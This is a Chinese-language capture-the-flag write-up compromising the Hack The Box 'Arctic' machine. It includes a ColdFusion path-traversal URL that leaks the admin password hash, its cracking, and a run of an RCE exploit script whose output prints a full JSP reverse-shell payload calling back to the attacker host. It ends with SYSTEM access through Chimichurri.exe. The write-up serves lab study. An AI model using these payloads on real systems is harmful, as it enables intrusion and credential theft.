Arctic-htb-writeup

0x00 靶场技能介绍

章节技能:ColdFusion任意文件读取漏洞、john哈希破解、ColdFusion 8 RCE漏洞、文件传输技能、Chimichurri.exe漏洞利用工具使用

参考链接:https://www.jgeek.cn/article/66

参考链接:https://0xdf.gitlab.io/2020/05/19/htb-arctic.html

0x01 用户权限获取

1、获取下靶机IP地址:10.10.10.11

2、扫描下开放端口情况

1
2
3
4
5
PORT      STATE SERVICE VERSION
135/tcp   open  msrpc   Microsoft Windows RPC
8500/tcp  open  fmtp?
49154/tcp open  msrpc   Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

3、访问下8500端口的服务情况

http://10.10.10.11:8500/

4、访问CFIDE目录下的文件

5、发现该服务疑似是 ColdFusion 的服务,结合综合信息,进行关键词搜索

coldfusion directory traversal

6、位于首页的就是一个漏洞链接,进行查看

https://www.exploit-db.com/exploits/14641

7、结合里面的说明,进行漏洞利用

1
2
3
http://server/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en

http://10.10.10.11:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en

1
2
3
#Wed Mar 22 20:53:51 EET 2017 rdspassword=0IA/F[[E>[$_6& \\Q>[K\=XP \n password=2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03 encrypted=true

#Wed Mar 22 20:53:51 EET 2017 rdspassword=0IA/F[[E>[$_6& \\Q>[K\=XP \n password=2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03 encrypted=true

8、接下来使用john进行哈希破解

1
2
3
4
5
6
┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo john hash  -w /usr/share/wordlists/rockyou.txt 

happyday         (?) 

https://sha1.gromweb.com/?hash=2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03

9、这里应该是使用密码成功登录后台

10、根据首页的信息 ColdFusion 8 ,搜索相关漏洞信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
┌──(kali㉿offsec)-[~/Desktop]
└─$ searchsploit ColdFusion 8
----------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                               |  Path
----------------------------------------------------------------------------- ---------------------------------
Adobe ColdFusion < 11 Update 10 - XML External Entity Injection              | multiple/webapps/40346.py
Adobe ColdFusion Server 8.0.1 - '/administrator/enter.cfm' Query String Cros | cfm/webapps/33170.txt
Adobe ColdFusion Server 8.0.1 - '/wizards/common/_authenticatewizarduser.cfm | cfm/webapps/33167.txt
Adobe ColdFusion Server 8.0.1 - '/wizards/common/_logintowizard.cfm' Query S | cfm/webapps/33169.txt
Adobe ColdFusion Server 8.0.1 - 'administrator/logviewer/searchlog.cfm?start | cfm/webapps/33168.txt
ColdFusion 8.0.1 - Arbitrary File Upload / Execution (Metasploit)            | cfm/webapps/16788.rb
ColdFusion MX - Missing Template Cross-Site Scripting                        | cfm/remote/21548.txt
Adobe ColdFusion 8 - Remote Command Execution (RCE)                          | cfm/webapps/50057.py
----------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results


Adobe ColdFusion 8 - Remote Command Execution (RCE)                          | cfm/webapps/50057.py

11、这里让我关注到的是这个远程命令执行的漏洞

12、通过查看漏洞源码里的信息,发现是可生成shell的

1
2
3
4
5
6
# Generate a payload that connects back and spawns a command shell
print("\nGenerating a payload...")
os.system(f'msfvenom -p java/jsp_shell_reverse_tcp LHOST={lhost} LPORT={lport} -o {filename}.jsp')

# Create a request
request = urllib.request.Request(f'http://{rhost}:{rport}/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm?Command=FileUpload&Type=File&CurrentFolder=/{filename}.jsp%00', data=data)

13、直接运行漏洞利用脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
┌──(kali㉿offsec)-[~/Desktop]
└─$ python3 50057.py

Generating a payload...
Payload size: 1496 bytes
Saved as: bedb3bfd29c546859f501ea88661e907.jsp

Priting request...
Content-type: multipart/form-data; boundary=f9b66a2735794d2a8a6427de08828976
Content-length: 1697

--f9b66a2735794d2a8a6427de08828976
Content-Disposition: form-data; name="newfile"; filename="bedb3bfd29c546859f501ea88661e907.txt"
Content-Type: text/plain

<%@page import="java.lang.*"%>
<%@page import="java.util.*"%>
<%@page import="java.io.*"%>
<%@page import="java.net.*"%>

<%
  class StreamConnector extends Thread
  {
    InputStream bB;
    OutputStream sC;

    StreamConnector( InputStream bB, OutputStream sC )
    {
      this.bB = bB;
      this.sC = sC;
    }

    public void run()
    {
      BufferedReader eh  = null;
      BufferedWriter b5D = null;
      try
      {
        eh  = new BufferedReader( new InputStreamReader( this.bB ) );
        b5D = new BufferedWriter( new OutputStreamWriter( this.sC ) );
        char buffer[] = new char[8192];
        int length;
        while( ( length = eh.read( buffer, 0, buffer.length ) ) > 0 )
        {
          b5D.write( buffer, 0, length );
          b5D.flush();
        }
      } catch( Exception e ){}
      try
      {
        if( eh != null )
          eh.close();
        if( b5D != null )
          b5D.close();
      } catch( Exception e ){}
    }
  }

  try
  {
    String ShellPath;
if (System.getProperty("os.name").toLowerCase().indexOf("windows") == -1) {
  ShellPath = new String("/bin/sh");
} else {
  ShellPath = new String("cmd.exe");
}

    Socket socket = new Socket( "10.10.14.2", 4444 );
    Process process = Runtime.getRuntime().exec( ShellPath );
    ( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
    ( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
  } catch( Exception e ) {}
%>

--f9b66a2735794d2a8a6427de08828976--


Sending request and printing response...


                <script type="text/javascript">
                        window.parent.OnUploadCompleted( 0, "/userfiles/file/bedb3bfd29c546859f501ea88661e907.jsp/bedb3bfd29c546859f501ea88661e907.txt", "bedb3bfd29c546859f501ea88661e907.txt", "0" );
                </script>


Printing some information for debugging...
lhost: 10.10.14.2
lport: 4444
rhost: 10.10.10.11
rport: 8500
payload: bedb3bfd29c546859f501ea88661e907.jsp

Deleting the payload...

Listening for connection...

Executing the payload...
listening on [any] 4444 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.11] 49256







Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\ColdFusion8\runtime\bin>whomai
whomai

C:\ColdFusion8\runtime\bin>whoami
whoami
arctic\tolis

C:\ColdFusion8\runtime\bin>

14、那就读取下初始的flag信息吧

1
2
3
4
5
C:\ColdFusion8\runtime\bin>type C:\Users\tolis\Desktop\user.txt
type C:\Users\tolis\Desktop\user.txt
a9021b88f3af397e2f746359b189f143

C:\ColdFusion8\runtime\bin>

0x02 系统权限获取

15、查看下系统信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
C:\ColdFusion8\runtime\bin>systeminfo
systeminfo

Host Name:                 ARCTIC
OS Name:                   Microsoft Windows Server 2008 R2 Standard 
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                55041-507-9857321-84451
Original Install Date:     22/3/2017, 11:09:45 ��
System Boot Time:          9/3/2024, 5:52:35 ��
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2294 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             el;Greek
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory:     6.143 MB
Available Physical Memory: 5.042 MB
Virtual Memory: Max Size:  12.285 MB
Virtual Memory: Available: 11.180 MB
Virtual Memory: In Use:    1.105 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.11

C:\ColdFusion8\runtime\bin>

16、查看下用户信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
C:\ColdFusion8\runtime\bin>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

C:\ColdFusion8\runtime\bin>

17、这里使用了一个通用的枚举工具进行了枚举,但是由于我本机的原因,安装库方面的问题,无法使用这个工具

1
2
3
4
5
6
7
8
9
10
11
12
┌──(kali㉿offsec)-[~/Desktop/tools/Windows-Exploit-Suggester]
└─$ python2 windows-exploit-suggester.py --update
[*] initiating winsploit version 3.3...
[+] writing to file 2024-03-08-mssb.xls
[*] done


┌──(kali㉿offsec)-[~/Desktop/tools/Windows-Exploit-Suggester]
└─$ python2 windows-exploit-suggester.py --database 2024-03-08-mssb.xls --systeminfo sysinfo-htb-Arctic 
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[-] please install and upgrade the python-xlrd library

18、然后参照演练报告知道了,这里是需要使用Chimichurri.exe这个漏洞利用工具的,传递漏洞利用工具到目标靶机上

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
C:\Users\tolis\Downloads>dir \\10.10.14.2\share
dir \\10.10.14.2\share
 Volume in drive \\10.10.14.2\share has no label.
 Volume Serial Number is ABCD-EFAA

 Directory of \\10.10.14.2\share

25/02/2024  04:16 ��         8.323.072 chisel_1.9.1_linux_arm64
02/02/2024  04:41 ��    <DIR>          frp_0.43.0_linux_amd64
02/02/2024  04:42 ��    <DIR>          frp_0.43.0_linux_arm64
23/02/2024  09:51 ��    <DIR>          htb-portscan
12/11/2023  02:55 ��    <DIR>          pspy
08/03/2024  11:15 ��    <DIR>          Windows-Exploit-Suggester
25/02/2024  04:14 ��         9.006.080 chisel_1.9.1_windows_amd64
13/05/2005  11:53 ��            68.608 nc.exe
07/12/2021  02:57 ��            27.136 PrintSpoofer64.exe
08/03/2024  11:23 ��            97.280 Chimichurri.exe
               5 File(s)     17.542.656 bytes
               5 Dir(s)               0 bytes free

C:\Users\tolis\Downloads>copy \\10.10.14.2\share\Chimichurri.exe .
copy \\10.10.14.2\share\Chimichurri.exe .
        1 file(s) copied.

C:\Users\tolis\Downloads>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 5C03-76A8

 Directory of C:\Users\tolis\Downloads

09/03/2024  07:23 ��    <DIR>          .
09/03/2024  07:23 ��    <DIR>          ..
08/03/2024  11:23 ��            97.280 Chimichurri.exe
07/12/2021  02:57 ��            27.136 PrintSpoofer64.exe
               2 File(s)        124.416 bytes
               2 Dir(s)   1.433.980.928 bytes free

C:\Users\tolis\Downloads>

19、开始利用漏洞并读取最终flag信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
C:\Users\tolis\Downloads>Chimichurri.exe 10.10.14.2 443
Chimichurri.exe 10.10.14.2 443
/Chimichurri/-->This exploit gives you a Local System shell <BR>/Chimichurri/-->Changing registry values...<BR>/Chimichurri/-->Got SYSTEM token...<BR>/Chimichurri/-->Running reverse shell...<BR>/Chimichurri/-->Restoring default registry values...<BR>
C:\Users\tolis\Downloads>

┌──(kali㉿offsec)-[~/Desktop]
└─$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.11] 49556
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\tolis\Downloads>whoami
whoami
nt authority\system

C:\Users\tolis\Downloads>type C:/Users/Administrator/Desktop/root.txt
type C:/Users/Administrator/Desktop/root.txt
The syntax of the command is incorrect.

C:\Users\tolis\Downloads>cd C:/Users/Administrator/Desktop/
cd C:/Users/Administrator/Desktop/

C:\Users\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 5C03-76A8

 Directory of C:\Users\Administrator\Desktop

22/03/2017  09:02 ��    <DIR>          .
22/03/2017  09:02 ��    <DIR>          ..
09/03/2024  05:53 ��                34 root.txt
               1 File(s)             34 bytes
               2 Dir(s)   1.433.980.928 bytes free

C:\Users\Administrator\Desktop>type root.txt
type root.txt
8dcb68724658ed191b667da961c6e2b7

C:\Users\Administrator\Desktop>

0x03 通关凭证展示

https://www.hackthebox.com/achievement/machine/1705469/9

打靶记
#shooting-range
Arctic-htb-writeup
https://sh1yan.top/2024/03/08/Arctic-htb-writeup/
作者
shiyan
发布于
2024年3月8日
许可协议